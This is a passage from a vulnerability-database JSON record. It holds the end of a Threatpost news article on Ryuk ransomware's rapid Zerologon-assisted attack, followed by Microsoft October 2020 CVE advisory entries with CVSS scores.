and 10 minutes, the Ryuk gang pivoted from the primary domain controller, using RDP to connect to backup servers.\n\n\u201cThen more domain reconnaissance was performed using AdFind. Once this completed\u2026the threat actors were ready for their final objective,\u201d according to DFIR\u2019s report.\n\n## **Five Hours Later: Ryuk**\n\nFor the final phase of the attack, the Ryuk operators first deployed their ransomware executable onto backup servers. After that, the malware was dropped on other servers in the environment, and then workstations.\n\nRyuk is a highly active malware, responsible for a string of recent hits, including a high-profile attack that [shut down Universal Health Services](<https://threatpost.com/universal-health-ransomware-hospitals-nationwide/159604/>) (UHS), a Fortune-500 owner of a nationwide network of hospitals.\n\n\u201cThe threat actors finished their objective by executing the ransomware on the primary domain controller, and at the five-hour mark, the attack completed,\u201d researchers said.\n\nThe use of Zerologon made the cybrcriminals\u2019 efforts much easier, since the attack didn\u2019t need to be aimed at a high-privileged user who would likely have more security controls.\n\nIn fact, the toughest part of the campaign was the start of the attack \u2013 the successful installation of Bazar from the initial phishing email, which required user interaction. Researchers note that the user was a Domain User and did not have any other permissions \u2013 but that proved to be a non-issue, thanks to Zerologon.\n\nThe attack shows that organizations need to be ready to move more quickly than ever in response to any detected malicious activity.\n\n\u201cYou need to be ready to act in less than an hour, to make sure you can effectively disrupt the threat actor,\u201d according to researchers.\n\n## **Zerologon Attacks Surge**\n\nThe case study comes as exploitation attempts against Zerologon spike. Government officials [last week warned that](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>) advanced persistent threat actors (APTs) are now leveraging the bug to target elections support systems.\n\nThat came just days after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)). The APT is MERCURY (also known as MuddyWater, Static Kitten and Seedworm). And, [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[In September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **Github. This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\n_ _\n", "cvss3": {}, "published": "2020-10-19T16:36:00", "type": "threatpost", "title": "Ryuk Ransomware Gang Uses Zerologon Bug for Lightning-Fast Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-19T16:36:00", "id": "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "href": "https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.\n\nAn attacker who successfully exploited the vulnerability would gain execution on a victim system.\n\nThe security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Base3D Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17003"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-17003", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17003", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory. An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage.\n\nThe security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Media Foundation Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16915"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16915", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16915", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of the Windows Camera Codec Pack. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe security update addresses the vulnerability by correcting how the Windows Camera Codec Pack handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows Camera Codec Pack Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16968"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16968", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16968", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of the Windows Camera Codec Pack. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe security update addresses the vulnerability by correcting how the Windows Camera Codec Pack handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows Camera Codec Pack Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16967"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16967", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16967", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system.\n\nTo exploit the vulnerability, a user would have to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Graphics Components handle objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Microsoft Graphics Components Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16923"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16923", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16923", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker could run a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.\n\nAn attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system.\n\nThe security update addresses the vulnerability by correcting how Hyper-V validates guest operating system user input.\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows Hyper-V Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16891"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16891", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16891", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:08", "description": "An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n\nAn attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. To exploit the vulnerability, an attacker could run a specially crafted application.\n\nThe security update addresses the vulnerability by correcting the way that WER handles and executes files.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows Error Reporting Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16909"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16909", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16909", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16938"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16938", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16938", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the targeted user. If the targeted user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Outlook software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nNote that where severity is indicated as Critical in the Affected Products table, the Preview Pane is an attack vector.\n\nThe security update addresses the vulnerability by correcting how Outlook handles objects in memory.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Microsoft Outlook Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16947"], "modified": "2020-10-15T07:00:00", "id": "MS:CVE-2020-16947", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16947", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.\n\nExploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nThe security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Microsoft SharePoint Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16951"], "modified": "2020-11-19T08:00:00", "id": "MS:CVE-2020-16951", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16951", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.\n\nExploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nThe security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Microsoft SharePoint Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16952", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.\n\nTo exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.\n\nThe update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows TCP/IP Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-15T07:00:00", "id": "MS:CVE-2020-16898", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16898", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability:\n\n * In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability and then convince users to view the website. An attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to open an email attachment or click a link in an email or instant message.\n * In a file-sharing attack scenario, an attacker could provide a specially crafted document file that is designed to exploit the vulnerability, and then convince users to open the document file.\n\nThe security update addresses the vulnerability by correcting the way that the Windows GDI handles objects in the memory.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "GDI+ Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16911"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16911", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16911", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:09", "description": "An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol ([MS-NRPC](<https://docs.microsoft.com/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>)). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network.\n\nTo exploit the vulnerability, an unauthenticated attacker would be required to use MS-NRPC to connect to a domain controller to obtain domain administrator access.\n\nMicrosoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how Netlogon handles the usage of Netlogon secure channels.\n\nFor guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/kb/4557222>) (updated September 28, 2020).\n\nWhen the second phase of Windows updates become available in Q1 2021, customers will be notified via a revision to this security vulnerability. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See [Microsoft Technical Security Notifications](<https://technet.microsoft.com/en-us/security/dd252948>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 